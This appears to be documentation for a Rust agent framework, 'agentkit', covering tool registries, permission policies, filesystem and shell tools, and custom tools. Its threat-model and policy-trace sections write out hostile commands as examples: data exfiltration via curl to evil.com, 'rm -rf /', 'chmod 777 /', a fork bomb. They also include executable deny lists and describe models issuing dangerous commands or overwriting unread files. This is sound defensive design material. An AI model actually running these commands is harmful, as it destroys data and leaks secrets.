ToolRequest and ToolResult

#![allow(unused)]
fn main() {
pub struct ToolRequest {
    pub call_id: ToolCallId,
    pub tool_name: ToolName,
    pub input: Value,
    pub session_id: SessionId,
    pub turn_id: TurnId,
    pub metadata: MetadataMap,
}
}

The request carries everything the tool needs to execute in context. Session and turn IDs let tools make context-aware decisions without depending on loop internals.

#![allow(unused)]
fn main() {
pub struct ToolResult {
    pub result: ToolResultPart,
    pub duration: Option<Duration>,
    pub metadata: MetadataMap,
}
}

The result wraps a ToolResultPart (from agentkit-core) with execution metadata.

ToolContext

#![allow(unused)]
fn main() {
pub struct ToolContext<'a> {
    pub capability: CapabilityContext<'a>,
    pub permissions: &'a dyn PermissionChecker,
    pub resources: &'a dyn ToolResources,
    pub cancellation: Option<TurnCancellation>,
}
}

The context gives tools access to permissions, shared resources (like filesystem policy state), and cancellation. Tools don’t reach into the loop — they get a narrow execution context.

The registry

#![allow(unused)]
fn main() {
pub struct ToolRegistry {
    tools: BTreeMap<ToolName, Arc<dyn Tool>>,
}
}

The registry is simple: register tools, look them up by name, iterate specs. It uses BTreeMap for deterministic ordering.

#![allow(unused)]
fn main() {
let registry = ToolRegistry::new()
    .with(ReadFileTool::default())
    .with(WriteFileTool::default())
    .with(ShellExecTool::default());
}

The builder pattern via .with() makes registration ergonomic. Registries from different tool crates can be merged:

#![allow(unused)]
fn main() {
let registry = agentkit_tool_fs::registry()
    .merge(agentkit_tool_shell::registry());
}
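A minimal registry along these lines might look like the sketch below. The `Tool` trait here is reduced to just a name for brevity; the real trait carries a full `ToolSpec` and an async `invoke`:

```rust
use std::collections::BTreeMap;
use std::sync::Arc;

// Reduced Tool trait: just enough for registration by name.
trait Tool: Send + Sync {
    fn name(&self) -> &str;
}

struct EchoTool;
impl Tool for EchoTool {
    fn name(&self) -> &str { "echo" }
}
struct ReadFileTool;
impl Tool for ReadFileTool {
    fn name(&self) -> &str { "fs.read_file" }
}

#[derive(Default)]
struct ToolRegistry {
    tools: BTreeMap<String, Arc<dyn Tool>>,
}

impl ToolRegistry {
    // Builder-style registration, mirroring .with() above.
    fn with(mut self, tool: impl Tool + 'static) -> Self {
        self.tools.insert(tool.name().to_string(), Arc::new(tool));
        self
    }
    // Later registrations win on name collisions in this sketch.
    fn merge(mut self, other: ToolRegistry) -> Self {
        self.tools.extend(other.tools);
        self
    }
    fn names(&self) -> Vec<&str> {
        self.tools.keys().map(String::as_str).collect()
    }
}

fn main() {
    let registry = ToolRegistry::default()
        .with(EchoTool)
        .merge(ToolRegistry::default().with(ReadFileTool));
    // BTreeMap gives deterministic, sorted iteration order.
    assert_eq!(registry.names(), vec!["echo", "fs.read_file"]);
    println!("{:?}", registry.names());
}
```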

The executor

The loop doesn’t call tools directly. It goes through a ToolExecutor:

#![allow(unused)]
fn main() {
pub trait ToolExecutor {
    async fn execute(
        &self,
        request: ToolRequest,
        ctx: &mut ToolContext<'_>,
    ) -> ToolExecutionOutcome;
}
}

The executor handles:

  1. Registry lookup
  2. Permission preflight
  3. Approval determination
  4. Tool invocation
  5. Error normalization

This centralized layer is where safety logic lives, rather than being duplicated in every tool.

Execution outcomes

#![allow(unused)]
fn main() {
pub enum ToolExecutionOutcome {
    Completed(ToolResult),
    Interrupted(ToolInterruption),
    Failed(ToolError),
}

pub enum ToolInterruption {
    ApprovalRequired(ApprovalRequest),
    AuthRequired(AuthRequest),
}
}

Not every execution failure is an error. An approval-required outcome means the tool is valid but needs human confirmation. The loop translates this into an interrupt.

Preflight permission requests

Tools can expose what they plan to do before execution by overriding proposed_requests on the Tool trait:

#![allow(unused)]
fn main() {
fn proposed_requests(
    &self,
    request: &ToolRequest,
) -> Result<Vec<Box<dyn PermissionRequest>>, ToolError> {
    Ok(Vec::new()) // default: no permissions needed
}
}

This lets the executor inspect and evaluate permission requests before any side effects occur. This is especially important for shell commands and filesystem writes — you want to check policy before running rm -rf, not after.
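The preflight step can be sketched as a short-circuiting evaluation over proposed requests. The policy rules below are purely illustrative, and the types are simplified stand-ins:

```rust
#[derive(Debug, PartialEq)]
enum Decision {
    Allow,
    Deny,
    RequireApproval,
}

struct PermissionRequest {
    kind: &'static str, // e.g. "shell.command"
    target: String,
}

// A toy checker: deny rm-style commands, allow one known-safe command,
// require approval for everything else.
fn evaluate(req: &PermissionRequest) -> Decision {
    match (req.kind, req.target.as_str()) {
        ("shell.command", cmd) if cmd.starts_with("rm") => Decision::Deny,
        ("shell.command", "cargo build") => Decision::Allow,
        _ => Decision::RequireApproval,
    }
}

// Preflight short-circuits on the first non-Allow decision; the tool body
// never runs if any request is denied or needs approval.
fn preflight(requests: &[PermissionRequest]) -> Decision {
    for req in requests {
        match evaluate(req) {
            Decision::Allow => continue,
            other => return other,
        }
    }
    Decision::Allow
}

fn main() {
    let safe = [PermissionRequest { kind: "shell.command", target: "cargo build".into() }];
    assert_eq!(preflight(&safe), Decision::Allow);

    let dangerous = [PermissionRequest { kind: "shell.command", target: "rm -rf /".into() }];
    assert_eq!(preflight(&dangerous), Decision::Deny);
    println!("preflight checks run before execution");
}
```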

Bridging to capabilities

ToolCapabilityProvider wraps a ToolRegistry as a CapabilityProvider, making every registered tool available as an Invocable. This is how the loop presents tools to the model alongside MCP-backed capabilities through a single unified list.

The execution flow

Putting it all together — here’s the complete path from model tool call to result:

Model emits ToolCallPart
       │
       ▼
┌──────────────────────────────────┐
│  ToolExecutor                    │
│                                  │
│  1. Registry lookup              │
│     ToolName → Arc<dyn Tool>     │
│     └── not found → ToolError    │
│                                  │
│  2. Preflight                    │
│     tool.proposed_requests()     │
│     → Vec<PermissionRequest>     │
│                                  │
│  3. Permission evaluation        │
│     for each PermissionRequest:  │
│     checker.evaluate(req)        │
│     ├── Allow → continue         │
│     ├── Deny → stop, return err  │
│     └── RequireApproval → stop,  │
│         return ToolInterruption  │
│                                  │
│  4. Invocation                   │
│     tool.invoke(request, ctx)    │
│     → ToolResult                 │
│                                  │
│  5. Error normalization          │
│     ToolError → ToolResult       │
│     with ToolResultPart          │
│     { is_error: true }           │
└──────────────────────────────────┘
       │
       ▼
ToolExecutionOutcome::Completed(ToolResult)

Tool errors (file not found, invalid JSON, network failure) are normalized into a ToolResult whose ToolResultPart has is_error: true — the model sees the error message as a tool result and can decide to retry, try differently, or report the failure. Errors don’t crash the loop or propagate to the host.

Design decisions

Why separate Tool from Invocable?

Tools add model-facing schema and permission semantics on top of the base invocable contract. A raw Invocable doesn’t have annotations, preflight actions, or a permission context. Tools are a specialization, not the lowest layer.

Why ToolName as a newtype?

ToolName prevents accidental confusion with other string identifiers. It also centralizes validation and supports namespacing conventions like fs.read_file or mcp.github.search.

Why JSON Schema for input?

Explicit JSON Schema keeps the tool contract provider-neutral. Tools don’t depend on derive macros or schema generation libraries that might not match every provider’s expectations. The schema is a JSON Value — any valid JSON Schema works:

#![allow(unused)]
fn main() {
input_schema: json!({
    "type": "object",
    "properties": {
        "path": { "type": "string", "description": "File path to read" },
        "from": { "type": "integer", "description": "Start line (optional)" },
        "to": { "type": "integer", "description": "End line (optional)" }
    },
    "required": ["path"]
})
}

If ergonomic schema helpers are needed later (derive macros, builder APIs), they can be added as optional companions without changing the base contract.

Why BTreeMap for the registry?

ToolRegistry uses BTreeMap<ToolName, Arc<dyn Tool>> rather than HashMap for deterministic tool ordering. When the model receives the tool list, the order is always the same — this matters for reproducibility and for providers that may be sensitive to tool ordering in the prompt.
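A quick illustration of the difference — BTreeMap keys iterate in sorted order regardless of insertion order, so the tool list the model sees never depends on registration sequence:

```rust
use std::collections::BTreeMap;

fn tool_names() -> Vec<String> {
    // Insertion order is shell first, then fs — but iteration is lexicographic.
    let mut registry: BTreeMap<String, &str> = BTreeMap::new();
    registry.insert("shell.exec".to_string(), "...");
    registry.insert("fs.write_file".to_string(), "...");
    registry.insert("fs.read_file".to_string(), "...");
    registry.keys().cloned().collect()
}
```

With a HashMap the order would vary between runs (and between processes, due to hash seeding), which makes prompts non-reproducible.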

Crate: agentkit-tools-core — depends on agentkit-capabilities and agentkit-core.

Permissions, approvals, and auth

Safety is the hardest problem in agent frameworks. An agent with shell access can delete your home directory. An agent with network access can exfiltrate data. The permission system is how you prevent this without making the agent useless.

This chapter covers the permission model, policy composition, and approval flow.

The ternary decision model

A permission check produces one of three outcomes:

#![allow(unused)]
fn main() {
pub enum PermissionDecision {
    Allow,
    Deny(PermissionDenial),
    RequireApproval(ApprovalRequest),
}
}

This is not a boolean. The third outcome — “this might be okay, but a human needs to confirm” — is essential for practical agent use. Categorically denying all writes makes the agent unable to code. Categorically allowing all writes makes it dangerous. Requiring approval for writes outside the workspace is the useful middle ground.

Permission requests

Policy is evaluated against a description of the proposed action, not against tool implementation details:

#![allow(unused)]
fn main() {
pub trait PermissionRequest: Send + Sync {
    fn kind(&self) -> &'static str;
    fn summary(&self) -> String;
    fn metadata(&self) -> &MetadataMap;
    fn as_any(&self) -> &dyn Any;
}
}

Built-in request types cover common scenarios:

  • ShellPermissionRequest — executable, argv, cwd, env keys, timeout
  • FileSystemPermissionRequest — Read, Write, Edit, Delete, Move, List, CreateDir
  • McpPermissionRequest — Connect, InvokeTool, ReadResource, FetchPrompt, UseAuthScope

Custom tools can define their own request types by implementing the trait directly. This makes custom tools first-class — they don’t have to squeeze into a generic Custom { kind, payload } variant.

The permission checker

#![allow(unused)]
fn main() {
pub trait PermissionChecker: Send + Sync {
    fn evaluate(&self, request: &dyn PermissionRequest) -> PermissionDecision;
}
}

This is synchronous by design. Permission checks should be local and cheap. If a host needs an external policy engine, it can build an adapter, but the base contract stays simple.

Policy composition

Real hosts need layered rules. A single monolithic checker doesn’t scale — you want separate rules for paths, commands, MCP servers, and custom actions, each maintained independently.

#![allow(unused)]
fn main() {
pub struct CompositePermissionChecker {
    policies: Vec<Box<dyn PermissionPolicy>>,
    fallback: PermissionDecision,
}
}

Each policy returns PolicyMatch — note the fourth option that PermissionDecision doesn’t have:

#![allow(unused)]
fn main() {
pub enum PolicyMatch {
    NoOpinion,                    // "I don't handle this kind of request"
    Allow,
    Deny(PermissionDenial),
    RequireApproval(ApprovalRequest),
}
}

NoOpinion is what makes composition work. A PathPolicy returns NoOpinion for shell commands because it only understands filesystem paths. A CommandPolicy returns NoOpinion for filesystem operations. Each policy handles its domain and defers on everything else.

The evaluation algorithm:

for each policy in registration order:
  match policy.evaluate(request):
    NoOpinion         → continue to next policy
    Allow             → record "saw allow", continue
    Deny(reason)      → STOP, return Deny immediately
    RequireApproval   → record it, continue

after all policies:
  if any Deny was seen     → return Deny         (already returned above)
  if any RequireApproval   → return RequireApproval
  if any Allow             → return Allow
  otherwise                → return fallback

Precedence rules:

  1. Explicit deny wins — a single Deny short-circuits immediately
  2. Require-approval wins over allow — if any policy says “ask the user”, the user is asked
  3. Allow wins over no-opinion — at least one policy must explicitly allow
  4. Fallback applies if no policy matches — configurable (typically Deny)
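The precedence rules above can be condensed into a short evaluation loop. This is a self-contained sketch: the enums are minimal stand-ins for PolicyMatch and PermissionDecision, and each policy is modeled as a plain function over a string request description rather than the real request trait.

```rust
// Minimal stand-ins for the crate's PolicyMatch and PermissionDecision.
#[derive(Debug, PartialEq)]
enum Decision {
    Allow,
    Deny(String),
    RequireApproval(String),
}

enum PolicyMatch {
    NoOpinion,
    Allow,
    Deny(String),
    RequireApproval(String),
}

fn evaluate(
    policies: &[&dyn Fn(&str) -> PolicyMatch],
    request: &str,
    fallback: Decision,
) -> Decision {
    let mut saw_allow = false;
    let mut approval: Option<String> = None;
    for policy in policies {
        match policy(request) {
            PolicyMatch::NoOpinion => continue,        // defer to the next policy
            PolicyMatch::Allow => saw_allow = true,    // record, keep scanning for a deny
            // An explicit deny short-circuits immediately.
            PolicyMatch::Deny(why) => return Decision::Deny(why),
            PolicyMatch::RequireApproval(req) => approval = Some(req),
        }
    }
    if let Some(req) = approval {
        return Decision::RequireApproval(req);         // approval beats allow
    }
    if saw_allow {
        return Decision::Allow;                        // at least one explicit allow
    }
    fallback                                           // no policy matched
}
```

Because deny returns from inside the loop while approval and allow are only recorded, the ordering guarantees fall out directly: deny > require-approval > allow > fallback.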

Built-in policies

  • PathPolicy — workspace root allowlists, protected path denylists, read-only subtrees
  • CommandPolicy — executable allowlists/denylists, cwd restrictions, env var restrictions
  • McpServerPolicy — trusted server allowlists, auth-scope restrictions
  • CustomKindPolicy — handles custom tool action kinds

Composing policies — a practical example

#![allow(unused)]
fn main() {
let checker = CompositePermissionChecker::new(PermissionDecision::Deny(default_denial()))
    .with_policy(PathPolicy::new()
        .allow_root("/workspace")
        .read_only_root("/workspace/vendor")
        .protect_root("/workspace/.env")
        .protect_root("/workspace/secrets/"))
    .with_policy(CommandPolicy::new()
        .allow_executable("git")
        .allow_executable("cargo")
        .allow_executable("rustc")
        .deny_executable("rm")
        .require_approval_for_unknown(true))
    .with_policy(McpServerPolicy::new()
        .allow_server("github"));
}

Trace through some requests with this configuration:

Request: FileSystem::Read("/workspace/src/main.rs")
  PathPolicy:    /workspace is allowed root → Allow
  CommandPolicy: NoOpinion (not a shell request)
  McpPolicy:     NoOpinion (not an MCP request)
  Result: Allow ✓

Request: FileSystem::Write("/workspace/.env")
  PathPolicy:    /workspace/.env is denied → Deny
  Result: Deny ✗ (short-circuit)

Request: FileSystem::Edit("/workspace/vendor/lib.rs")
  PathPolicy:    /workspace/vendor is read-only → Deny
  Result: Deny ✗ (short-circuit)

Request: Shell("curl", ["https://evil.com"])
  PathPolicy:    NoOpinion (not a filesystem request)
  CommandPolicy: "curl" is unknown, require_approval_for_unknown → RequireApproval
  McpPolicy:     NoOpinion
  Result: RequireApproval ⚠

Request: Shell("rm", ["-rf", "/"])
  PathPolicy:    NoOpinion
  CommandPolicy: "rm" is denied → Deny
  Result: Deny ✗ (short-circuit)

Request: Custom("deploy", {...})
  PathPolicy:    NoOpinion
  CommandPolicy: NoOpinion
  McpPolicy:     NoOpinion
  No policy matched → fallback: Deny ✗

Execution integration

The permission flow integrates with tool execution:

  1. Tool receives a request
  2. Tool exposes preflight PermissionRequest values
  3. Executor evaluates each request through the permission checker
  4. If any are denied → execution stops with a structured denial
  5. If any require approval → execution stops with an interrupt
  6. Otherwise → the tool executes

Multiple actions per tool call are evaluated together: if any deny, the whole call is denied. If any require approval, the whole call is interrupted. This is conservative by design.

Approval vs denial

The distinction matters:

  • Deny when an action is categorically disallowed: rm -rf /, reading /etc/shadow
  • Require approval when an action is risky but may be legitimate: writing outside the workspace, connecting to an unknown MCP server

Hosts should set this calibration through their policy configuration, not through agentkit defaults.

Custom permission requests

#![allow(unused)]
fn main() {
pub struct DeployPermissionRequest {
    pub environment: String,
    pub service: String,
    pub metadata: MetadataMap,
}

impl PermissionRequest for DeployPermissionRequest {
    fn kind(&self) -> &'static str { "myapp.deploy" }
    fn summary(&self) -> String {
        format!("Deploy {} to {}", self.service, self.environment)
    }
    // ...
}
}

Generic policies operate on kind() and metadata. Specialized host policies can downcast through as_any() for richer handling. This layering lets custom tools participate in the permission system without compromising on type safety.

Crate: Permission types live in agentkit-tools-core. Built-in policies are in the same crate. Tool crates like agentkit-tool-fs and agentkit-tool-shell define their specific request types.

Filesystem tools

A coding agent needs to read, write, and navigate files. This chapter covers agentkit-tool-fs: the built-in filesystem tools and their session-scoped safety policies.

The tool set

agentkit-tool-fs ships seven tools:

Tool                 Description                                   Annotations
fs.read_file         Read file contents with optional line ranges  read_only
fs.write_file        Write or overwrite a file                     destructive
fs.replace_in_file   Find-and-replace within a file                destructive
fs.move              Rename or move a file                         destructive
fs.delete            Delete a file                                 destructive
fs.list_directory    List directory contents                       read_only
fs.create_directory  Create a directory

All tools implement the Tool trait and can be registered with a single call:

#![allow(unused)]
fn main() {
let registry = agentkit_tool_fs::registry();
}

Read-before-write enforcement

The most important safety feature in the filesystem tools is FileSystemToolPolicy:

#![allow(unused)]
fn main() {
let resources = FileSystemToolResources::new()
    .with_policy(
        FileSystemToolPolicy::new()
            .require_read_before_write(true),
    );
}

When enabled, the policy tracks which files have been read in the current session. A write or replace operation on a file that hasn’t been read first is denied. This prevents the model from blindly overwriting files it hasn’t seen — a surprisingly common failure mode.

The tracking state lives in FileSystemToolResources, which implements the ToolResources trait and is passed to tools through ToolContext.
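A minimal sketch of the tracking logic — a session-scoped set of read paths consulted before writes. (The real FileSystemToolResources presumably holds similar state behind interior mutability; this stripped-down version is just the policy check.)

```rust
use std::collections::HashSet;
use std::path::{Path, PathBuf};

#[derive(Default)]
struct ReadTracker {
    read_paths: HashSet<PathBuf>,
}

impl ReadTracker {
    // Called by fs.read_file after a successful read.
    fn record_read(&mut self, path: &Path) {
        self.read_paths.insert(path.to_path_buf());
    }

    // A write is allowed if the file was read this session, or doesn't exist yet.
    fn check_write(&self, path: &Path, exists: bool) -> Result<(), String> {
        if !exists || self.read_paths.contains(path) {
            Ok(())
        } else {
            Err(format!("{} has not been read in this session", path.display()))
        }
    }
}
```

Because the tracker is session-scoped, a fresh session starts with an empty set and every existing file must be read again before it can be modified.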

Permission preflight

Every filesystem tool emits a FileSystemPermissionRequest before execution:

#![allow(unused)]
fn main() {
pub enum FileSystemPermissionRequest {
    Read { path: PathBuf },
    Write { path: PathBuf },
    Edit { path: PathBuf },
    Delete { path: PathBuf },
    Move { from: PathBuf, to: PathBuf },
    List { path: PathBuf },
    CreateDir { path: PathBuf },
}
}

These structured requests let PathPolicy make informed decisions:

  • Allow reads under the workspace root
  • Require approval for writes outside the workspace
  • Deny deletes of protected paths

Read-before-write: why it matters

Without this policy, the model can — and routinely does — overwrite files it hasn’t seen. The typical failure mode:

Without read-before-write:

  User: "Add error handling to parser.rs"
  Model: ToolCall(fs.write_file, { path: "src/parser.rs", content: "... entirely new file ..." })

  The model hallucinated the file contents. The original code is gone.
  Any code that wasn't in the model's context window is lost.


With read-before-write:

  User: "Add error handling to parser.rs"
  Model: ToolCall(fs.write_file, { path: "src/parser.rs", content: "..." })
  → Denied: "src/parser.rs has not been read in this session"

  Model: ToolCall(fs.read_file, { path: "src/parser.rs" })
  → Success: file contents returned

  Model: ToolCall(fs.replace_in_file, { path: "src/parser.rs", find: "...", replace: "..." })
  → Success: targeted edit

The policy is session-scoped — the tracker resets when a new session starts. Reading a file once unlocks writes and edits to it for the remainder of the session.

Implementation patterns

fs.read_file

Accepts a path and optional from/to line numbers. Returns the file contents as text. Records the path as “read” in FileSystemToolResources for read-before-write tracking.

Line range support lets the model read specific sections of large files without consuming the entire context window:

fs.read_file({ path: "src/main.rs", from: 50, to: 75 })
→ Returns lines 50-75 only

fs.replace_in_file

Accepts a path, find, replace, and an optional replace_all boolean. Reads the file, performs the replacement, writes the result. This is the primary editing tool — it’s more precise than full-file writes because the model only needs to specify the changed region.

The replacement is exact string matching, not regex. If the search text doesn’t appear in the file, the tool returns an error. When replace_all is false (the default), only the first occurrence is replaced — this avoids accidental mass edits.
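Those semantics can be expressed as a pure function — exact substring match, error when the search text is absent, first occurrence only unless replace_all. This is an illustration mirroring the input field names, not the crate’s code:

```rust
fn replace_in_text(
    content: &str,
    find: &str,
    replace: &str,
    replace_all: bool,
) -> Result<String, String> {
    if !content.contains(find) {
        // Exact match failed: surface an error the model can react to.
        return Err(format!("search text not found: {find:?}"));
    }
    Ok(if replace_all {
        content.replace(find, replace)
    } else {
        content.replacen(find, replace, 1) // first occurrence only
    })
}
```

Exact matching keeps failures loud and local: the model either quoted the file correctly (because it read it first) or gets an error, rather than a regex silently matching the wrong region.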

fs.write_file

Writes or overwrites an entire file. Subject to the read-before-write policy for existing files; files that don’t exist yet can be written without a prior read.

fs.list_directory

Returns the contents of a directory. Useful for the model to explore project structure before reading specific files. Returns filenames and basic metadata (file vs directory, size).

Error handling

Filesystem errors (file not found, permission denied, etc.) are returned as a ToolResult whose ToolResultPart has is_error: true. They are not panics or exceptions. The model sees the error message and can decide what to do — try a different path, ask the user, or give up.

Error flow:

  fs.read_file({ path: "nonexistent.rs" })
  → ToolResult { result: ToolResultPart { is_error: true, output: "File not found: nonexistent.rs", .. }, .. }
  → Model: "The file doesn't exist. Let me check the directory structure..."
  → fs.list_directory({ path: "src/" })
  → Model finds the correct file name and retries

This is a key design principle: tool errors are part of the conversation, not exceptions. The model can reason about errors and recover, which is essential for autonomous operation.

Example: openrouter-coding-agent uses the full filesystem registry to read, edit, and write files in a one-shot coding task.

Crate: agentkit-tool-fs — depends on agentkit-tools-core and agentkit-core.

Shell execution

Shell access is the most powerful and most dangerous tool an agent can have. This chapter covers agentkit-tool-shell, its safety boundaries, and how it integrates with cancellation and timeouts.

ShellExecTool

The crate provides a single tool: shell.exec.

#![allow(unused)]
fn main() {
let registry = agentkit_tool_shell::registry();
}

Input schema

Field       Type              Required  Description
executable  string            yes       Program to run
argv        [string]          no        Command-line arguments
cwd         string            no        Working directory
env         {string: string}  no        Environment variables
timeout_ms  integer           no        Timeout in milliseconds

Output

The tool returns structured JSON:

{
  "stdout": "...",
  "stderr": "...",
  "success": true,
  "exit_code": 0
}

Both stdout and stderr are captured. The model sees the full output and can reason about errors.

Permission preflight

Before spawning a process, the tool emits a ShellPermissionRequest:

#![allow(unused)]
fn main() {
pub struct ShellPermissionRequest {
    pub executable: String,
    pub argv: Vec<String>,
    pub cwd: Option<PathBuf>,
    pub env_keys: Vec<String>,
    pub metadata: MetadataMap,
}
}

Note that only environment keys are included, not values. Policy usually doesn’t need the full environment — knowing that AWS_SECRET_ACCESS_KEY is being passed is enough to flag the command.

CommandPolicy evaluates these requests:

#![allow(unused)]
fn main() {
let policy = CommandPolicy::new()
    .allow_executables(["ls", "cat", "git", "cargo"])
    .deny_executables(["rm", "dd", "mkfs"])
    .require_approval_for_unknown(true);
}

Cancellation

ShellExecTool respects TurnCancellation from the tool context. If the user presses Ctrl-C during a long-running command, the tool kills the subprocess and returns a cancellation result.

The implementation uses tokio::select! to race the subprocess against the cancellation future:

#![allow(unused)]
fn main() {
tokio::select! {
    result = child.wait_with_output() => { /* normal completion */ }
    _ = cancellation.cancelled() => { /* kill the child */ }
}
}

Timeouts

Per-invocation timeouts are supported through the timeout_ms input field. If the command exceeds the timeout, it’s killed and an error result is returned. This is independent of cancellation — timeouts are tool-scoped, cancellation is turn-scoped.
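The containment idea can be sketched without tokio: poll the child, and kill it when the deadline passes. (The real tool races the process against both the timeout and turn cancellation with tokio::select!; this std-only illustration handles just the timeout half.)

```rust
use std::io;
use std::process::{Child, ExitStatus};
use std::time::{Duration, Instant};

// Returns Ok(Some(status)) on normal completion, Ok(None) if the deadline
// hit and the child was killed.
fn wait_with_timeout(child: &mut Child, timeout: Duration) -> io::Result<Option<ExitStatus>> {
    let deadline = Instant::now() + timeout;
    loop {
        if let Some(status) = child.try_wait()? {
            return Ok(Some(status));
        }
        if Instant::now() >= deadline {
            child.kill()?; // terminate the runaway command
            child.wait()?; // reap it so no zombie process is left behind
            return Ok(None);
        }
        std::thread::sleep(Duration::from_millis(10));
    }
}
```

The kill-then-wait pair matters: killing without reaping leaves a zombie, and the async implementation has the same obligation.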

The shell tool in the agent loop

Shell execution is where the agent loop interacts most visibly with the outside world. A typical coding agent session involves dozens of shell commands: cargo build, cargo test, git diff, ls, grep. The integration with the task manager determines how these commands affect the loop:

Sequential (SimpleTaskManager):

  Model: ToolCall(shell.exec, { executable: "cargo", argv: ["build"] })
  Driver: execute inline, wait for completion (10 seconds)
  Driver: append result to transcript
  Driver: start next model turn


With ForegroundThenDetachAfter(5s):

  Model: ToolCall(shell.exec, { executable: "cargo", argv: ["build"] })
  Driver: start executing, wait up to 5 seconds
  └── if finishes in 3s → result appended, loop continues normally
  └── if still running at 5s → detach to background
      └── model receives a synthetic tool result: "task is running in the background"
      └── model continues its turn (e.g. reads another file)
      └── when build finishes, result appears in next turn

This integration is covered in detail in Chapter 18.

Security considerations

Shell execution is inherently dangerous. agentkit provides the policy tools to constrain it, but the host application is responsible for configuring appropriate policies.

The threat model

An LLM with shell access can:

  • Delete files (rm -rf /)
  • Exfiltrate data (curl -d @/etc/passwd https://evil.com)
  • Install software (pip install malware)
  • Modify system state (chmod 777 /)
  • Consume resources (fork bomb, dd if=/dev/zero)

These aren’t hypothetical — models will occasionally generate dangerous commands, especially when frustrated by errors or prompted adversarially.

Defence layers

Layer 1: Policy (prevent)
  CommandPolicy with allowlists and denylists
  Require approval for unknown commands

Layer 2: Timeout (contain)
  Per-invocation timeouts kill runaway commands
  Task manager detach prevents blocking

Layer 3: Sandbox (isolate)
  Run the agent in a container, VM, or restricted user
  Mount the workspace read-write, everything else read-only

Layer 4: Audit (detect)
  LoopObserver logs every shell command and its output
  Review logs for unexpected behaviour

Guidelines

  • Always pair ShellExecTool with a CommandPolicy
  • Use executable allowlists rather than denylists when possible — it’s easier to enumerate safe commands than to enumerate all dangerous ones
  • Consider running the agent in a sandboxed environment for untrusted inputs
  • Use require_approval_for_unknown(true) as a sensible default
  • Set reasonable timeouts — a build command that takes 10 minutes is probably stuck
  • Only expose the env_keys that tools actually need — don’t pass through AWS_SECRET_ACCESS_KEY unless required

Example: openrouter-parallel-agent uses shell tools with ForegroundThenDetachAfter routing — commands that take too long are automatically promoted to background tasks.

Crate: agentkit-tool-shell — depends on agentkit-tools-core, agentkit-core, and tokio.

Writing custom tools

Custom tools are the primary extension mechanism in agentkit. This chapter shows how to implement tools from simple to sophisticated, including preflight actions, custom permission types, and shared resources.

A minimal tool

#![allow(unused)]
fn main() {
use agentkit_tools_core::*;
use agentkit_core::*;
use async_trait::async_trait;
use serde_json::json;

pub struct EchoTool {
    spec: ToolSpec,
}

impl EchoTool {
    pub fn new() -> Self {
        Self {
            spec: ToolSpec {
                name: ToolName::new("echo"),
                description: "Return the input unchanged".into(),
                input_schema: json!({
                    "type": "object",
                    "properties": {
                        "message": { "type": "string" }
                    },
                    "required": ["message"]
                }),
                annotations: ToolAnnotations {
                    read_only_hint: true,
                    ..Default::default()
                },
                metadata: MetadataMap::new(),
            },
        }
    }
}

#[async_trait]
impl Tool for EchoTool {
    fn spec(&self) -> &ToolSpec {
        &self.spec
    }

    async fn invoke(
        &self,
        request: ToolRequest,
        _ctx: &mut ToolContext<'_>,
    ) -> Result<ToolResult, ToolError> {
        let message = request.input["message"]
            .as_str()
            .ok_or_else(|| ToolError::InvalidInput("missing message".into()))?;

        Ok(ToolResult {
            result: ToolResultPart {
                call_id: request.call_id,
                output: ToolOutput::Text(message.to_string()),
                is_error: false,
                metadata: MetadataMap::new(),
            },
            duration: None,
            metadata: MetadataMap::new(),
        })
    }
}
}

Register it:

#![allow(unused)]
fn main() {
let registry = ToolRegistry::new().with(EchoTool::new());
}

Using ToolContext

Tools receive a ToolContext that provides access to the current session, permissions, cancellation state, and shared resources:

#![allow(unused)]
fn main() {
async fn invoke(&self, request: ToolRequest, ctx: &mut ToolContext<'_>) -> Result<ToolResult, ToolError> {
    // Check cancellation
    if let Some(ref cancel) = ctx.cancellation {
        if cancel.is_cancelled() {
            return Err(ToolError::Cancelled);
        }
    }

    // Access shared resources
    let resources = ctx.resources;

    // Access session identity
    let session_id = ctx.capability.session_id;

    // ...
}
}

Adding preflight permission requests

For tools with side effects, override proposed_requests on the Tool trait to expose proposed actions before execution:

#![allow(unused)]
fn main() {
impl Tool for DeployTool {
    fn spec(&self) -> &ToolSpec { &self.spec }

    fn proposed_requests(
        &self,
        request: &ToolRequest,
    ) -> Result<Vec<Box<dyn PermissionRequest>>, ToolError> {
        let env = request.input["environment"].as_str().unwrap_or("unknown");
        Ok(vec![Box::new(DeployPermissionRequest {
            environment: env.to_string(),
            service: "my-service".into(),
            metadata: MetadataMap::new(),
        })])
    }

    async fn invoke(&self, request: ToolRequest, ctx: &mut ToolContext<'_>)
        -> Result<ToolResult, ToolError> { /* ... */ }
}
}

The executor evaluates these before calling invoke(). If any are denied or require approval, execution stops before any side effects occur.

Custom permission requests

Define your own permission request types:

#![allow(unused)]
fn main() {
pub struct DeployPermissionRequest {
    pub environment: String,
    pub service: String,
    pub metadata: MetadataMap,
}

impl PermissionRequest for DeployPermissionRequest {
    fn kind(&self) -> &'static str { "myapp.deploy" }
    fn summary(&self) -> String {
        format!("Deploy {} to {}", self.service, self.environment)
    }
    fn metadata(&self) -> &MetadataMap { &self.metadata }
    fn as_any(&self) -> &dyn Any { self }
}
}

Host policies can match on kind() generically, or downcast through as_any() for type-safe field access.
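Both matching styles look like this in miniature — the trait and request type are pared-down local copies, just enough to show the as_any round trip:

```rust
use std::any::Any;

// Pared-down local copy of the PermissionRequest trait.
trait PermissionRequest {
    fn kind(&self) -> &'static str;
    fn as_any(&self) -> &dyn Any;
}

struct DeployPermissionRequest {
    environment: String,
}

impl PermissionRequest for DeployPermissionRequest {
    fn kind(&self) -> &'static str {
        "myapp.deploy"
    }
    fn as_any(&self) -> &dyn Any {
        self
    }
}

// Generic policy: match on kind() alone, no knowledge of the concrete type.
fn is_deploy(req: &dyn PermissionRequest) -> bool {
    req.kind() == "myapp.deploy"
}

// Specialized policy: downcast for typed access to the request's fields.
fn needs_approval(req: &dyn PermissionRequest) -> bool {
    req.as_any()
        .downcast_ref::<DeployPermissionRequest>()
        .map_or(false, |d| d.environment == "production")
}
```

A generic policy that only reads kind() and metadata stays decoupled from custom tools; a host policy that downcasts gets full type safety for the requests it knows about.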

Shared resources via ToolResources

If your tool needs session-scoped state (like the filesystem tools’ read-before-write tracker), implement ToolResources:

#![allow(unused)]
fn main() {
pub trait ToolResources: Send + Sync {
    fn as_any(&self) -> &dyn Any;
}
}

Register resources when building the agent, and downcast in your tool’s invoke() method.

Tool composition patterns

Nesting agents as tools

A powerful pattern: implement a tool that runs a nested agent loop. The outer agent calls the tool with a task description, the tool starts an inner agent, runs it to completion, and returns the result.

Outer agent (orchestrator):
  Model: "I need to research this codebase and write a report"
